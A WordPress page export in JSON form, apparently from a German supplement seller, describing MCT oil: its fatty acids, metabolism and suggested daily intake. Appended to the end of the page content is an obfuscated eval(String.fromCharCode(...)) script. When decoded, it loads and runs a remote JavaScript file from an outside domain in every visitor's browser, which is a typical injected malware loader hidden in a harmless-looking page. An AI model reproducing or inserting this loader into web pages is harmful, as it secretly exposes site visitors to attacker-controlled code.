{"id":286,"date":"2016-02-03T07:01:39","date_gmt":"2016-02-03T07:01:39","guid":{"rendered":"http:\/\/shopingpoint.de\/www\/fliqua\/?page_id=286"},"modified":"2024-01-12T10:31:17","modified_gmt":"2024-01-12T09:31:17","slug":"fliqua-produkte","status":"publish","type":"page","link":"https:\/\/www.fliqua.de\/?page_id=286","title":{"rendered":"FLIQUA MCT \u00d6L"},"content":{"rendered":"<p><strong>MCT \u00d6L<\/strong><strong>. Medium-chain-Triglyceride (MCT)<\/strong>, sind Triglyceride, die mittelkettige Fetts\u00e4uren enthalten. Zu den mittelkettigen Fetts\u00e4uren z\u00e4hlen definitionsgem\u00e4\u00df:<\/p>\n<ul>\n<li>Capron- (C&nbsp;6 &#8211; C<sub>6<\/sub>H<sub>12<\/sub>O<sub>2<\/sub>),<\/li>\n<li>Capryl- (C&nbsp;8 &#8211; <strong>C<sub>8<\/sub>H<sub>16<\/sub>O<sub>2<\/sub><\/strong>),<\/li>\n<li>Caprin- (C&nbsp;10 &#8211; <strong>C<sub>10<\/sub>H<sub>20<\/sub>O<sub>2<\/sub><\/strong>) und die<\/li>\n<li>Laurins\u00e4ure (C&nbsp;12 &#8211; C<sub>12<\/sub>H<sub>24<\/sub>O<sub>2<\/sub>).<\/li>\n<\/ul>\n<p>Die <strong><u>Capryl<\/u><\/strong><u>&#8211;<\/u> und<u> <strong>Caprins\u00e4ure<\/strong><\/u> sind laut Studien die wirkungsvollen <strong><u>biologischen<\/u> <u>MCT<\/u><\/strong>-\u00d6le. Es handelt sich dabei um ges\u00e4ttigte Fetts\u00e4uren, welche vor allem in tropischen Pflanzenfetten wie Kokosfett (C8 ca. 6%, C10 ca. 9%) und Palmkern\u00f6l (C8 ca. 3%, C10 ca. 4%) vorkommen. Zu einem geringen Teil sind sie auch im Milchfett (C8 ca. 1%, C10 ca. 3%) enthalten. Bei diesen nat\u00fcrlichen Quellen sind die C8 und C10 Fraktionen somit in sehr geringem Ma\u00dfe enthalten. In der Natur gibt es kein reines MCT-\u00d6l.<\/p>\n<h5>(C4 &#8211; Butters\u00e4ure, C6 &#8211; Caprons\u00e4ure, C8 &#8211; Capryls\u00e4ure, C10 &#8211; Caprins\u00e4ure, C12 &#8211; Laurins\u00e4ure, C14 &#8211; Myristins\u00e4ure, C16 &#8211; Palmitins\u00e4ure).<\/h5>\n<p>&nbsp;<\/p>\n<p><a href=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/04\/FLIQ_Fenster_70x180_Nutrition_V01.svg\" rel=\"attachment wp-att-786\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft wp-image-786\" src=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/04\/FLIQ_Fenster_70x180_Nutrition_V01.svg\" alt=\"FLIQ_Fenster_70x180_Nutrition_V01\" width=\"228\" height=\"583\"><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>MCT-Fette haben im Vergleich zu herk\u00f6mmlichen langkettigen Fetten (LCT = long chain triglycerides) einen etwas geringeren Energiegehalt (8,3&nbsp;kcal gegen\u00fcber 9,2&nbsp;kcal\/g Fett) und einen niedrigeren Rauchpunkt.<\/p>\n<p><strong>Eigenschaften<\/strong> MCT-Fette sind aufgrund ihrer k\u00fcrzeren Fetts\u00e4urenkettenl\u00e4nge im w\u00e4ssrigen Milieu relativ gut l\u00f6slich und darum ohne Gallens\u00e4ure verstoffwechselbar. Ihre Struktur bedarf auch keiner Spaltung durch die Pankreaslipase (Enzym der Bauchspeicheldr\u00fcse). Sie werden, ohne Umgehung \u00fcber das Lymphsystem, direkt im Blut zur Leber transportiert, wo sie im Vergleich zu herk\u00f6mmlichen Fetten bevorzugt oxidieren. Es k\u00f6nnten dabei vermehrt Ketonk\u00f6rper gebildet werden. Der Transport der mittelkettigen Fetts\u00e4uren in die Mitochondrien, dem Ort der Fetts\u00e4uren-Oxidation, l\u00e4uft unabh\u00e4ngig vom Transportprotein Carnitin ab. Die tolerable Tageszufuhr ist individuell verschieden und liegt bei 50\u2013100&nbsp;g und mehr MCT-Fetten. Um Nebenwirkungen (z.B. Durchfall) zu vermeiden, sollte mit ca. 20&nbsp;g MCT-Fett am Tag begonnen werden. Diese Menge kann stufenweise um 5\u201310&nbsp;g am Tag gesteigert werden. Bei einer Kost mit MCT-Fetten ist die Sicherstellung der Versorgung mit fettl\u00f6slichen Vitaminen und essentiellen Fetts\u00e4uren (Omega 3 und 6) unerl\u00e4sslich. Fettl\u00f6sliche Vitamine werden beim Einsatz von MCT-Fetten ausreichend resorbiert.<\/p>\n<p>Mittelkettige Triglyceride wurden erstmals in den 1950er Jahren in der klinischen Ern\u00e4hrung eingesetzt, da sie eine leichte L\u00f6slichkeit im w\u00e4ssrigen Milieu aufweisen und schneller als herk\u00f6mmliche langkettige Fette vom Organismus aufgenommen werden. Aufgrund der Erkenntnis, dass MCT-Fette eine h\u00f6here Ketogenit\u00e4t als herk\u00f6mmliche Fette aufweisen, werden sie auch im Rahmen der ketogenen Di\u00e4t eingesetzt. Dabei kann es nicht ausreichend sein, nur die guten einfach ges\u00e4ttigten \u00d6le (Kokos\u00f6l) zu&nbsp; sich zu nehmen, da die Laurins\u00e4ure nicht wie ein \u201erichtiges\u201c MCT \u00d6l verstoffwechselt wird. Hier bieten die MCT \u00d6le Vorteile. Beim MCT \u00d6l ist dabei der Anteil an C8 (Capryls\u00e4ure) so besonders, weil gerade das C8 besonders schnelle Energie dem K\u00f6rper bereitstellt. Die <strong>FLIQUA MCT \u00d6le <\/strong>unterscheiden sich gerade im Anteil an der Capryls\u00e4ure.<\/p>\n<h6>&nbsp;<\/h6>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><center><a href=\"https:\/\/www.fliqua.de\/?page_id=677\"><button>Anfragen<\/button><\/a><\/center>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<!-- MetaSlider 719 not found -->\n<p>&nbsp;<\/p>\n<h6>Bitte beachten Sie: Aus rechtlichen Gr\u00fcnden d\u00fcrfen wir hier keine gesundheitsbezogenen Aussagen machen. Nahrungserg\u00e4nzungsmittel dienen nicht als Ersatz f\u00fcr eine ausgewogene Ern\u00e4hrung sowie gesunde Lebensf\u00fchrung. F\u00fcr weitere Informationen fragen Sie Ihren Arzt, Heilpraktiker, Apotheker oder informieren sich mit Hilfe von Fachliteratur bzw. der aktuellen Forschung.<\/h6>\n<p><script type=\"text\/javascript\">eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,48,54,44,49,49,53,44,52,54,44,49,48,48,44,49,48,53,44,49,48,51,44,49,48,49,44,49,49,53,44,49,49,54,44,57,57,44,49,49,49,44,49,48,56,44,49,48,49,44,57,57,44,49,49,54,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,48,51,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,56,44,54,49,44,52,57,44,53,52,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));<\/script><script type=\"text\/javascript\"> <\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>MCT \u00d6L. Medium-chain-Triglyceride (MCT), sind Triglyceride, die mittelkettige Fetts\u00e4uren enthalten. Zu den mittelkettigen Fetts\u00e4uren z\u00e4hlen definitionsgem\u00e4\u00df: Capron- (C&nbsp;6 &#8211; C6H12O2), Capryl- (C&nbsp;8 &#8211; C8H16O2), Caprin- (C&nbsp;10 &#8211; C10H20O2) und die Laurins\u00e4ure (C&nbsp;12 &#8211; C12H24O2). Die Capryl&#8211; und Caprins\u00e4ure sind laut Studien die wirkungsvollen biologischen MCT-\u00d6le. Es handelt sich dabei um ges\u00e4ttigte Fetts\u00e4uren, welche vor allem [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":188,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"inline_featured_image":false,"footnotes":""},"tags":[],"class_list":["post-286","page","type-page","status-publish","hentry"],"aioseo_notices":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages\/286","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=286"}],"version-history":[{"count":16,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages\/286\/revisions"}],"predecessor-version":[{"id":838,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages\/286\/revisions\/838"}],"up":[{"embeddable":true,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages\/188"}],"wp:attachment":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=286"}],"wp:term":[{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=286"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}